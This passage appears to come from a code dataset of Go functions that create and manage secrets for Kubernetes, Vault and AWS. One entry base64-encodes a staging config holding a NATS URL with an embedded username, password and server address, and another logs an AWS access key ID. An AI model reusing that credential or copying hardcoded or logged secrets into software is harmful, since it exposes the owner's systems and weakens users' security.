secret.KubeconfigToSecret(secret.AdminSecretName,\n\t\tnamespace, caGroup.AdminKbCfg)\n\t// create secret for service account rsa key\n\tsvcActSrt, err := secret.RsaKeyToSecret(secret.ServiceAccountSecretName,\n\t\tnamespace, caGroup.ServiceAccountPrivateKey)\n\tif err != nil {\n\t\treturn err\n\t}\n\tsecrets := []*v1.Secret{rootSrt, apiserverSrt, etcdSrt,\n\t\tctrlMgrSrt, adminSrt, svcActSrt}\n\n\t// create all secrets on metacluster\n\tfor _, srt := range secrets {\n\t\tlog.Info(\"creating secret\", \"name\",\n\t\t\tsrt.Name, \"namespace\", srt.Namespace)\n\t\terr := r.Create(context.TODO(), srt)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func getSecret(name, namespace string, labels map[string]string) *corev1.Secret {\n\treturn &corev1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tAPIVersion: APIv1,\n\t\t\tKind: SecretKind,\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tLabels: labels,\n\t\t},\n\t}\n}", "func NewSecret(l int) string {\n\treturn gotp.RandomSecret(l)\n}", "func init() {\n\tpackr.PackJSONBytes(\"./../../secrets\", \"secrets.yaml.template\", \"\\\"bmF0c1VybDogIiR7TkFUU19VUkx9Igpmcm9udFVybDogIiR7RlJPTlRfVVJMfSIKYXBpVXJsOiAiJHtBUElfVVJMfSIK\\\"\")\n\tpackr.PackJSONBytes(\"./../../secrets\", \"staging.yaml\", \"\\\"bmF0c1VybDogIm5hdHM6Ly9vdHRlcmx5LXNlY3VyZTo0NmFhOWE4YmJiM2M0NzQzMDJiYkAzNS4xOTUuMTQ4LjI0OTo0MjIyIgpmcm9udFVybDogImh0dHBzOi8vYXBwLnNlY3VyZWFwaS5kZXYiCmFwaVVybDogImh0dHBzOi8vYXBpLnNlY3VyZWFwaS5kZXYiCg==\\\"\")\n}", "func (e *SessionInsertProcessors) CreateSecret(i interface{}) (interface{}, *HttpError) {\n\tmodel := i.(*SessionPostModel)\n\n\tsecret, err := Secret.Generate()\n\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn nil, ErrUnknown\n\t}\n\n\tvar expiration time.Time\n\terr = e.db.Get(\n\t\t&expiration,\n\t\t`INSERT INTO session_secrets (secret, \"user\") VALUES ($1, $2)\n\t\tRETURNING expires`,\n\t\tsecret, e.user,\n\t)\n\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn nil, ErrUnknown\n\t}\n\n\te.secret = secret\n\te.expiration = expiration\n\n\treturn model, nil\n}", "func CreateSecret(client kubernetes.Interface, namespace string, secretName string, data string) (core_v1.SecretInterface, error) {\n\tlogrus.Infof(\"Creating secret\")\n\tsecretClient := client.CoreV1().Secrets(namespace)\n\t_, err := secretClient.Create(GetSecret(namespace, secretName, data))\n\ttime.Sleep(10 * time.Second)\n\treturn secretClient, err\n}", "func (k *Keys) NewSecret(file string, length int) ([]byte, error) {\n\tif _, err := os.Stat(file); err != nil {\n\t\t// Create the parent directories and the file.\n\t\tif err := os.MkdirAll(path.Dir(file), 0700); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tsecret := make([]byte, length)\n\t\tif _, err := rand.Read(secret); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tenc, err := k.CryptingKey.Encrypt(secret)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif err := ioutil.WriteFile(file, enc, 0700); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn secret, nil\n\t}\n\n\tenc, err := ioutil.ReadFile(file)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tdec, err := k.CryptingKey.Decrypt(enc)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif len(dec) != length {\n\t\tZeroBytes(dec)\n\t\treturn nil, newError(\"The decrypted value had length %d, but it should have had length %d\", len(dec), length)\n\t}\n\n\treturn dec, nil\n}", "func (bc *ReconcileJenkinsInstance) newSetupSecret(instanceName types.NamespacedName) (*corev1.Secret, error) {\n\texists := false\n\tjenkinsInstance, err := bc.getJenkinsInstance(instanceName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsetupSecret, err := bc.getSetupSecret(instanceName)\n\t// If the resource doesn't exist, we'll create it\n\tif err != nil {\n\t\tif !errors.IsNotFound(err) {\n\t\t\treturn nil, err\n\t\t}\n\t} else {\n\t\t// If the Secret is not controlled by this JenkinsInstance resource, we should log\n\t\t// a warning to the event recorder and return\n\t\tif !metav1.IsControlledBy(setupSecret, jenkinsInstance) {\n\t\t\tmsg := fmt.Sprintf(MessageResourceExists, setupSecret.GetName())\n\t\t\tbc.Event(jenkinsInstance, corev1.EventTypeWarning, ErrResourceExists, msg)\n\t\t\treturn setupSecret, fmt.Errorf(msg)\n\t\t}\n\n\t\texists = true\n\t}\n\n\tlabels := map[string]string{\n\t\t\"app\": \"jenkinsci\",\n\t\t\"controller\": jenkinsInstance.GetName(),\n\t\t\"component\": string(jenkinsInstance.UID),\n\t}\n\n\tadminUserConfig, err := configdata.Asset(\"init-groovy/0-jenkins-config.groovy\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ttype JenkinsInfo struct {\n\t\tUser string\n\t\tPassword string\n\t\tUrl string\n\t\tAdminEmail string\n\t\tAgentPort int32\n\t\tExecutors int32\n\t}\n\n\tadminSecret, err := bc.getAdminSecret(instanceName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// decode Admin secret strings\n\tadminUser := string(adminSecret.Data[\"user\"][:])\n\tadminPassword := string(adminSecret.Data[\"pass\"][:])\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tjenkinsInfo := JenkinsInfo{\n\t\tUser: string(adminUser[:]),\n\t\tPassword: string(adminPassword[:]),\n\t\tUrl: jenkinsInstance.Spec.Location,\n\t\tAdminEmail: jenkinsInstance.Spec.AdminEmail,\n\t\tAgentPort: JenkinsAgentPort,\n\t\tExecutors: jenkinsInstance.Spec.Executors,\n\t}\n\n\t// parse the plugin array\n\trequiredPlugin, err := configdata.Asset(\"environment/required-plugins\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tplugins := jenkinsInstance.Spec.Plugins\n\tvar pluginList []string\n\n\t// add required plugins first\n\tscanner := bufio.NewScanner(strings.NewReader(string(requiredPlugin[:])))\n\tfor scanner.Scan() {\n\t\tpluginList = append(pluginList, scanner.Text())\n\t}\n\n\t// add user plugins next\n\tfor _, plugin := range plugins {\n\t\tpluginInfo := fmt.Sprintf(\"%s:%s\", plugin.Id, plugin.Version)\n\t\tpluginList = append(pluginList, pluginInfo)\n\t}\n\n\t// TODO: remove duplicate plugin ids\n\n\t// parse the groovy config template\n\tconfigTemplate, err := template.New(\"jenkins-config\").Parse(string(adminUserConfig[:]))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar jenkinsConfigParsed bytes.Buffer\n\tif err := configTemplate.Execute(&jenkinsConfigParsed, jenkinsInfo); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// load seed job dsl from bindata\n\tseedDsl, err := configdata.Asset(\"jobdsl/seed-job-dsl\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// add things to the string data\n\tbyteData := map[string][]byte{\n\t\t\"0-jenkins-config.groovy\": []byte(jenkinsConfigParsed.String()),\n\t\t\"plugins.txt\": []byte(strings.Join(pluginList, \"\\n\")),\n\t\t\"seed-job-dsl\": []byte(string(seedDsl[:])),\n\t\t\"user\": []byte(adminUser),\n\t}\n\n\tif jenkinsInstance.Spec.PluginConfig != nil {\n\t\tif jenkinsInstance.Spec.PluginConfig.Config != \"\" {\n\t\t\tbyteData[\"1-user-config.groovy\"] = []byte(jenkinsInstance.Spec.PluginConfig.Config)\n\t\t}\n\n\t\tif jenkinsInstance.Spec.PluginConfig.ConfigSecret != \"\" {\n\t\t\tconfigSecret := &corev1.Secret{}\n\t\t\terr = bc.Client.Get(\n\t\t\t\tcontext.TODO(), types.NewNamespacedNameFromString(\n\t\t\t\t\tfmt.Sprintf(\"%s%c%s\", jenkinsInstance.GetNamespace(), types.Separator,\n\t\t\t\t\t\tjenkinsInstance.Spec.PluginConfig.ConfigSecret)),\n\t\t\t\tconfigSecret)\n\t\t\tif err != nil {\n\t\t\t\tglog.Errorf(\"Failed to load plugin config secret %s: %s\",\n\t\t\t\t\tjenkinsInstance.Spec.PluginConfig.ConfigSecret, err)\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\t// add values from config secret to our setup secret in\n\t\t\t// lexical order\n\t\t\tkeys := make([]string, 0)\n\t\t\tfor k, _ := range configSecret.Data {\n\t\t\t\tkeys = append(keys, k)\n\t\t\t}\n\t\t\tsort.Strings(keys)\n\n\t\t\tfor _, keyVal := range keys {\n\t\t\t\tkey := fmt.Sprintf(\"2-user-config-%s.groovy\", keyVal)\n\t\t\t\tbyteData[key] = configSecret.Data[keyVal]\n\t\t\t}\n\t\t}\n\t}\n\n\tif exists {\n\t\tsetupSecretCopy := setupSecret.DeepCopy()\n\t\tsetupSecretCopy.Data = util.MergeSecretData(byteData, setupSecret.Data)\n\t\tsetupSecretCopy.Labels = labels\n\n\t\tif reflect.DeepEqual(setupSecretCopy.Data, setupSecret.Data) {\n\t\t\treturn setupSecret, nil\n\t\t}\n\n\t\tglog.Info(\"updating secret\")\n\t\terr = bc.Client.Update(context.TODO(), setupSecretCopy)\n\t\tif err != nil {\n\t\t\treturn setupSecretCopy, err\n\t\t}\n\n\t\t// safe restart jenkins\n\t\tservice, err := bc.getService(instanceName)\n\t\tif err != nil {\n\t\t\treturn setupSecretCopy, err\n\t\t}\n\n\t\terr = util.SafeRestartJenkins(service, setupSecretCopy, JenkinsMasterPort)\n\t\tif err != nil {\n\t\t\treturn setupSecretCopy, err\n\t\t}\n\n\t\tif err != nil {\n\t\t\tglog.Errorf(\"failed to restart jenkins instance %s after setup secret %s was updated\",\n\t\t\t\tjenkinsInstance.GetName(), setupSecret.GetName())\n\t\t}\n\t\treturn setupSecretCopy, err\n\t} else {\n\t\tsetupSecret = &corev1.Secret{\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: jenkinsInstance.GetName(),\n\t\t\t\tNamespace: jenkinsInstance.GetNamespace(),\n\t\t\t\tLabels: labels,\n\t\t\t},\n\t\t\tData: byteData,\n\t\t\tType: corev1.SecretTypeOpaque,\n\t\t}\n\n\t\terr = controllerutil.SetControllerReference(jenkinsInstance, setupSecret, bc.scheme)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\terr = bc.Client.Create(context.TODO(), setupSecret)\n\t\treturn setupSecret, err\n\t}\n}", "func (c *controller) CreateSecret(ctx context.Context, secret *Secret) error {\n\tsecrets := c.k8sCoreClient.Secrets(secret.Namespace)\n\t_, err := secrets.Get(secret.Name, metav1.GetOptions{})\n\tif err == nil {\n\t\t_, err = secrets.Update(secret.BuildSecret())\n\t\treturn err\n\t}\n\t_, err = secrets.Create(secret.BuildSecret())\n\treturn err\n}", "func New(mgr manager.Manager, operatorNamespace, operandNamespace string) (runtimecontroller.Controller, error) {\n\toperatorCache := mgr.GetCache()\n\treconciler := &reconciler{\n\t\tclient: mgr.GetClient(),\n\t\tcache: operatorCache,\n\t\trecorder: mgr.GetEventRecorderFor(controllerName),\n\t\toperatorNamespace: operatorNamespace,\n\t\toperandNamespace: operandNamespace,\n\t}\n\tc, err := runtimecontroller.New(controllerName, mgr, runtimecontroller.Options{Reconciler: reconciler})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Index ingresscontrollers over the default certificate name so that\n\t// secretToIngressController can look up ingresscontrollers that\n\t// reference the secret.\n\tif err := operatorCache.IndexField(context.Background(), &operatorv1.IngressController{}, \"defaultCertificateName\", client.IndexerFunc(func(o client.Object) []string {\n\t\tsecret := controller.RouterEffectiveDefaultCertificateSecretName(o.(*operatorv1.IngressController), operandNamespace)\n\t\treturn []string{secret.Name}\n\t})); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create index for ingresscontroller: %v\", err)\n\t}\n\n\tsecretsInformer, err := operatorCache.GetInformer(context.Background(), &corev1.Secret{})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create informer for secrets: %v\", err)\n\t}\n\tif err := c.Watch(&source.Informer{Informer: secretsInformer}, handler.EnqueueRequestsFromMapFunc(reconciler.secretToIngressController)); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := c.Watch(source.Kind(operatorCache, &operatorv1.IngressController{}), &handler.EnqueueRequestForObject{}, predicate.Funcs{\n\t\tCreateFunc: func(e event.CreateEvent) bool { return reconciler.hasSecret(e.Object, e.Object) },\n\t\tDeleteFunc: func(e event.DeleteEvent) bool { return reconciler.hasSecret(e.Object, e.Object) },\n\t\tUpdateFunc: func(e event.UpdateEvent) bool { return reconciler.secretChanged(e.ObjectOld, e.ObjectNew) },\n\t\tGenericFunc: func(e event.GenericEvent) bool { return reconciler.hasSecret(e.Object, e.Object) },\n\t}, predicate.NewPredicateFuncs(func(o client.Object) bool {\n\t\treturn reconciler.hasClusterIngressDomain(o) || isDefaultIngressController(o)\n\t})); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn c, nil\n}", "func New(text string) (Key, error) {\n\treturn decode(nil, []byte(text))\n}", "func (c *SecretsManagerClient) CreateSecret(ctx context.Context, in *secretsmanager.CreateSecretInput) (*secretsmanager.CreateSecretOutput, error) {\n\tc.CreateSecretInput = in\n\n\tif c.CreateSecretOutput != nil {\n\t\treturn c.CreateSecretOutput, nil\n\t}\n\n\tif in.Name == nil {\n\t\treturn nil, errors.New(\"missing secret name\")\n\t}\n\tif in.SecretBinary != nil && in.SecretString != nil {\n\t\treturn nil, errors.New(\"cannot specify both secret binary and secret string\")\n\t}\n\tif in.SecretBinary == nil && in.SecretString == nil {\n\t\treturn nil, errors.New(\"must specify either secret binary or secret string\")\n\t}\n\n\tGlobalSecretCache[*in.Name] = StoredSecret{\n\t\tBinaryValue: in.SecretBinary,\n\t\tCreated: time.Now(),\n\t\tValue: utility.FromStringPtr(in.SecretString),\n\t}\n\n\treturn &secretsmanager.CreateSecretOutput{\n\t\tARN: in.Name,\n\t\tName: in.Name,\n\t}, nil\n}", "func (d secret) Process(appMeta helmify.AppMetadata, obj *unstructured.Unstructured) (bool, helmify.Template, error) {\n\tif obj.GroupVersionKind() != configMapGVC {\n\t\treturn false, nil, nil\n\t}\n\tsec := corev1.Secret{}\n\terr := runtime.DefaultUnstructuredConverter.FromUnstructured(obj.Object, &sec)\n\tif err != nil {\n\t\treturn true, nil, errors.Wrap(err, \"unable to cast to secret\")\n\t}\n\tmeta, err := processor.ProcessObjMeta(appMeta, obj)\n\tif err != nil {\n\t\treturn true, nil, err\n\t}\n\n\tname := appMeta.TrimName(obj.GetName())\n\tnameCamelCase := strcase.ToLowerCamel(name)\n\n\tsecretType := string(sec.Type)\n\tif secretType != \"\" {\n\t\tsecretType, err = yamlformat.Marshal(map[string]interface{}{\"type\": secretType}, 0)\n\t\tif err != nil {\n\t\t\treturn true, nil, err\n\t\t}\n\t}\n\n\tvalues := helmify.Values{}\n\tvar data, stringData string\n\ttemplatedData := map[string]string{}\n\tfor key := range sec.Data {\n\t\tkeyCamelCase := strcase.ToLowerCamel(key)\n\t\tif key == strings.ToUpper(key) {\n\t\t\tkeyCamelCase = strcase.ToLowerCamel(strings.ToLower(key))\n\t\t}\n\t\ttemplatedName, err := values.AddSecret(true, nameCamelCase, keyCamelCase)\n\t\tif err != nil {\n\t\t\treturn true, nil, errors.Wrap(err, \"unable add secret to values\")\n\t\t}\n\t\ttemplatedData[key] = templatedName\n\t}\n\tif len(templatedData) != 0 {\n\t\tdata, err = yamlformat.Marshal(map[string]interface{}{\"data\": templatedData}, 0)\n\t\tif err != nil {\n\t\t\treturn true, nil, err\n\t\t}\n\t\tdata = strings.ReplaceAll(data, \"'\", \"\")\n\t\tdata = format.FixUnterminatedQuotes(data)\n\t}\n\n\ttemplatedData = map[string]string{}\n\tfor key := range sec.StringData {\n\t\tkeyCamelCase := strcase.ToLowerCamel(key)\n\t\tif key == strings.ToUpper(key) {\n\t\t\tkeyCamelCase = strcase.ToLowerCamel(strings.ToLower(key))\n\t\t}\n\t\ttemplatedName, err := values.AddSecret(false, nameCamelCase, keyCamelCase)\n\t\tif err != nil {\n\t\t\treturn true, nil, errors.Wrap(err, \"unable add secret to values\")\n\t\t}\n\t\ttemplatedData[key] = templatedName\n\t}\n\tif len(templatedData) != 0 {\n\t\tstringData, err = yamlformat.Marshal(map[string]interface{}{\"stringData\": templatedData}, 0)\n\t\tif err != nil {\n\t\t\treturn true, nil, err\n\t\t}\n\t\tstringData = strings.ReplaceAll(stringData, \"'\", \"\")\n\t\tstringData = format.FixUnterminatedQuotes(stringData)\n\t}\n\n\treturn true, &result{\n\t\tname: name + \".yaml\",\n\t\tdata: struct {\n\t\t\tType string\n\t\t\tMeta string\n\t\t\tData string\n\t\t\tStringData string\n\t\t}{Type: secretType, Meta: meta, Data: data, StringData: stringData},\n\t\tvalues: values,\n\t}, nil\n}", "func (c *client) Create(sType, org, name string, s *library.Secret) (*library.Secret, error) {\n\t// create log fields from secret metadata\n\tfields := logrus.Fields{\n\t\t\"org\": org,\n\t\t\"repo\": name,\n\t\t\"secret\": s.GetName(),\n\t\t\"type\": sType,\n\t}\n\n\t// check if secret is a shared secret\n\tif strings.EqualFold(sType, constants.SecretShared) {\n\t\t// update log fields from secret metadata\n\t\tfields = logrus.Fields{\n\t\t\t\"org\": org,\n\t\t\t\"team\": name,\n\t\t\t\"secret\": s.GetName(),\n\t\t\t\"type\": sType,\n\t\t}\n\t}\n\n\tc.Logger.WithFields(fields).Tracef(\"creating vault %s secret %s for %s/%s\", sType, s.GetName(), org, name)\n\n\t// validate the secret\n\terr := database.SecretFromLibrary(s).Validate()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// convert our secret to a Vault secret\n\tvault := vaultFromSecret(s)\n\n\t// create the secret for the Vault service\n\tswitch sType {\n\tcase constants.SecretOrg:\n\t\treturn c.createOrg(org, s.GetName(), vault.Data)\n\tcase constants.SecretRepo:\n\t\treturn c.createRepo(org, name, s.GetName(), vault.Data)\n\tcase constants.SecretShared:\n\t\treturn c.createShared(org, name, s.GetName(), vault.Data)\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"invalid secret type: %v\", sType)\n\t}\n}", "func createSessionFromSecret(secret *corev1.Secret) *session.Session {\n\n accessKeyId := string(secret.Data[accessKeyIdPropName])\n secretAccessKey := string(secret.Data[secretAccessKeyPropName])\n\n\n log.Infof(\"Creating session from secret %q containing accessKeyId=%s\", *secret.Metadata.Name, accessKeyId)\n\n return createSession(accessKeyId, secretAccessKey, *secret.Metadata.Name + \"-\" +\"orig\")\n\n}", "func NewSecretManager() Secret {\n\tconfig := aws2.NewRemote()\n\tmanager := secret.New(session.Must(session.NewSession(config.Configuration)),\n\t\tconfig.Configuration)\n\n\treturn Secret{\n\t\tManager: manager,\n\t\tlogger: help.NewLog(),\n\t\tSecretID: aws.String(os.Getenv(\"AWS_SECRET_NAME\")),\n\t\t//VersionStage: aws.String(os.Getenv(\"AWSCURRENT\")),\n\t}\n}", "func NewSecretFromStringData(cr *gramolav1.AppService, name string, namespace string, stringData map[string]string) *corev1.Secret {\n\tlabels := GetAppServiceLabels(cr, name)\n\treturn &corev1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: \"v1\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tLabels: labels,\n\t\t},\n\t\tStringData: stringData,\n\t}\n}", "func NewSecret(name, username, password, namespace string, isToken bool) (*Secret) {\n\tlog.Debugf(\"NewSecret(%v, %v, %v)\", username, strings.Repeat(\"*\", len(password)), namespace)\n\n\tvar s *Secret\n\ts = &Secret{\n\t\tName: name,\n\t\tPassword: password,\n\t\tNamespace: namespace,\n\t\tInterface: orch.ClientSet.CoreV1().Secrets(namespace),\n\t}\n\tif !isToken {\n\t\ts.Username = username\n\t}\n\n\treturn s\n}", "func NewSecret() *secret {\n\tid, err := randPathString()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn &secret{ID: id, time: time.Now()}\n}", "func New(c config.Token) token.Token {\n\tvar adapter token.Token = &adapter{\n\t\tsecret: []byte(c.Secret()),\n\t}\n\treturn adapter\n}", "func (s *Secret) Create() error {\n\tlog.Debug(\"Secret.Create()\")\n\tvar data map[string][]byte\n\tif s.Username != \"\" {\n\t\tdata = map[string][]byte{\n\t\t\tcorev1.BasicAuthUsernameKey: []byte(s.Username),\n\t\t\tcorev1.BasicAuthPasswordKey: []byte(s.Password),\n\t\t}\n\t} else {\n\t\tdata = map[string][]byte{\n\t\t\tcorev1.BasicAuthPasswordKey: []byte(s.Password),\n\t\t}\n\t}\n\t// k8s.io/api/core/v1/types.go\n\tcoreSecret := &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: s.Name,\n\t\t},\n\t\tData: data,\n\t\tType: corev1.SecretTypeBasicAuth,\n\t}\n\tvar err error\n\n\t_, err = s.Get()\n\tif errors.IsNotFound(err) {\n\t\ts.secrets, err = s.Interface.Create(coreSecret)\n\t} else {\n\t\ts.secrets, err = s.Interface.Update(coreSecret)\n\t}\n\n\treturn err\n}", "func newTLSSecret(vr *api.VaultService, caKey *rsa.PrivateKey, caCrt *x509.Certificate, commonName, secretName string,\n\taddrs []string, fieldMap map[string]string) (*v1.Secret, error) {\n\ttc := tls.CertConfig{\n\t\tCommonName: commonName,\n\t\tOrganization: orgForTLSCert,\n\t\tAltNames: tls.NewAltNames(addrs),\n\t}\n\tkey, crt, err := newKeyAndCert(caCrt, caKey, tc)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"new TLS secret failed: %v\", err)\n\t}\n\tsecret := &v1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: \"v1\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: secretName,\n\t\t\tNamespace: vr.Namespace,\n\t\t\tLabels: labelsForVault(vr.Name),\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\tfieldMap[\"key\"]: tls.EncodePrivateKeyPEM(key),\n\t\t\tfieldMap[\"cert\"]: tls.EncodeCertificatePEM(crt),\n\t\t\tfieldMap[\"ca\"]: tls.EncodeCertificatePEM(caCrt),\n\t\t},\n\t}\n\treturn secret, nil\n}", "func CreateSecret(name string) *corev1.Secret {\n\treturn &corev1.Secret{\n\t\tTypeMeta: genTypeMeta(gvk.Secret),\n\t\tObjectMeta: genObjectMeta(name, true),\n\t}\n}", "func (k *Kube) CreateSecret(ctx context.Context, in *CreateSecretInput) (out *CreateSecretOutput, err error) {\n\tif err = k.checkInput(ctx, in); err != nil {\n\t\treturn nil, err\n\t}\n\n\tsecret := &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tLabels: map[string]string{\"image\": in.Image, \"project\": in.Project, \"registry\": in.Registry, \"tag\": in.Tag},\n\t\t},\n\t\tType: v1.SecretTypeDockerConfigJson,\n\t\tData: map[string][]byte{},\n\t}\n\n\tsecret.Data[v1.DockerConfigJsonKey], err = transformCredentials(in.Username, in.Password, in.Registry)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = k.visor.CreateResource(ctx, kubevisor.ResourceTypeSecrets, secret, \"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &CreateSecretOutput{\n\t\tName: secret.Name,\n\t}, nil\n}", "func NewSecret() string {\n\treturn RandomWithMd5(32)\n}", "func NewSecretController(informerFactory informers.SharedInformerFactory, syncrule helpers.SyncRule, local bool) *SecretController {\n\tsecretInformer := informerFactory.Core().V1().Secrets()\n\n\tc := &SecretController{\n\t\tinformerFactory: informerFactory,\n\t\tsecretInformer: secretInformer,\n\t\tsyncrule: syncrule,\n\t}\n\tif local {\n\t\tsecretInformer.Informer().AddEventHandler(\n\t\t\t// Your custom resource event handlers.\n\t\t\tcache.ResourceEventHandlerFuncs{\n\t\t\t\t// Called on creation\n\t\t\t\tAddFunc: c.localSecretAdd,\n\t\t\t\t// Called on resource update and every resyncPeriod on existing resources.\n\t\t\t\tUpdateFunc: c.localSecretUpdate,\n\t\t\t\t// Called on resource deletion.\n\t\t\t\tDeleteFunc: c.localSecretDelete,\n\t\t\t},\n\t\t)\n\t\treturn c\n\t}\n\tsecretInformer.Informer().AddEventHandler(\n\t\t// Your custom resource event handlers.\n\t\tcache.ResourceEventHandlerFuncs{\n\t\t\t// Called on creation\n\t\t\tAddFunc: c.secretAdd,\n\t\t\t// Called on resource update and every resyncPeriod on existing resources.\n\t\t\tUpdateFunc: c.secretUpdate,\n\t\t\t// Called on resource deletion.\n\t\t\tDeleteFunc: c.secretDelete,\n\t\t},\n\t)\n\treturn c\n}", "func Create(input CreateInput) *corev1.Pod {\n\tExpect(input.Creator).NotTo(BeNil(), \"input.Creator is required for Pod.Create\")\n\tExpect(input.Config).NotTo(BeNil(), \"input.Config is required for Pod.Create\")\n\tExpect(input.Name).NotTo(BeEmpty(), \"input.Name is required for Pod.Create\")\n\tExpect(input.Namespace).NotTo(BeEmpty(), \"input.Namespace is required for Pod.Create\")\n\tExpect(input.SecretProviderClassName).NotTo(BeEmpty(), \"input.SecretProviderClassName is required for Pod.Create\")\n\n\tBy(fmt.Sprintf(\"Creating Pod \\\"%s\\\"\", input.Name))\n\n\treadOnly := true\n\tpod := &corev1.Pod{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: input.Name,\n\t\t\tNamespace: input.Namespace,\n\t\t\tLabels: input.Labels,\n\t\t},\n\t\tSpec: corev1.PodSpec{\n\t\t\tTerminationGracePeriodSeconds: to.Int64Ptr(int64(0)),\n\t\t\tContainers: []corev1.Container{\n\t\t\t\t{\n\t\t\t\t\tName: \"tester\",\n\t\t\t\t\tImage: \"registry.k8s.io/e2e-test-images/busybox:1.29-4\",\n\t\t\t\t\tImagePullPolicy: corev1.PullIfNotPresent,\n\t\t\t\t\tCommand: []string{\"/bin/sleep\", \"10000\"},\n\t\t\t\t\tVolumeMounts: []corev1.VolumeMount{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tName: \"secrets-store-inline\",\n\t\t\t\t\t\t\tMountPath: \"/mnt/secrets-store\",\n\t\t\t\t\t\t\tReadOnly: true,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tVolumes: []corev1.Volume{\n\t\t\t\t{\n\t\t\t\t\tName: \"secrets-store-inline\",\n\t\t\t\t\tVolumeSource: corev1.VolumeSource{\n\t\t\t\t\t\tCSI: &corev1.CSIVolumeSource{\n\t\t\t\t\t\t\tDriver: \"secrets-store.csi.k8s.io\",\n\t\t\t\t\t\t\tReadOnly: &readOnly,\n\t\t\t\t\t\t\tVolumeAttributes: map[string]string{\"secretProviderClass\": input.SecretProviderClassName},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tif input.NodePublishSecretRefName != \"\" {\n\t\tfor idx := range pod.Spec.Volumes {\n\t\t\tpod.Spec.Volumes[idx].CSI.NodePublishSecretRef = &corev1.LocalObjectReference{Name: input.NodePublishSecretRefName}\n\t\t}\n\t}\n\n\tif input.Config.IsWindowsTest {\n\t\tpod.Spec.NodeSelector = map[string]string{\"kubernetes.io/os\": \"windows\"}\n\t} else if input.Config.IsGPUTest {\n\t\tpod.Spec.NodeSelector = map[string]string{\n\t\t\t\"kubernetes.io/os\": \"linux\",\n\t\t\t\"accelerator\": \"nvidia\",\n\t\t}\n\t} else {\n\t\tpod.Spec.NodeSelector = map[string]string{\"kubernetes.io/os\": \"linux\"}\n\t}\n\n\tif input.ServiceAccountName != \"\" {\n\t\tpod.Spec.ServiceAccountName = input.ServiceAccountName\n\t}\n\n\tExpect(input.Creator.Create(context.TODO(), pod)).Should(Succeed())\n\treturn pod\n}", "func (k *K8sutil) CreateCertsSecret(namespace, clusterName, certsDir string) error {\n\t// Read certs from disk\n\tnodeKeyStore, err := ioutil.ReadFile(fmt.Sprintf(\"%s/node-keystore.jks\", certsDir))\n\tif err != nil {\n\t\tlogrus.Error(\"Could not read certs:\", err)\n\t\treturn err\n\t}\n\n\tsgadminKeyStore, err := ioutil.ReadFile(fmt.Sprintf(\"%s/sgadmin-keystore.jks\", certsDir))\n\tif err != nil {\n\t\tlogrus.Error(\"Could not read certs:\", err)\n\t\treturn err\n\t}\n\n\t//TODO return err\n\ttrustStore, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/truststore.jks\", certsDir))\n\tca, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/ca.pem\", certsDir))\n\tcaKey, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/ca-key.pem\", certsDir))\n\tnode, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/node.pem\", certsDir))\n\tnodeKey, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/node-key.pem\", certsDir))\n\tnodeKeyPkcs8, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/node-key.pkcs8.pem\", certsDir))\n\tsgadmin, _ := ioutil.ReadFile(fmt.Sprintf(\"%s/sgadmin.pem\", certsDir))\n\tsgadminKey, _ := 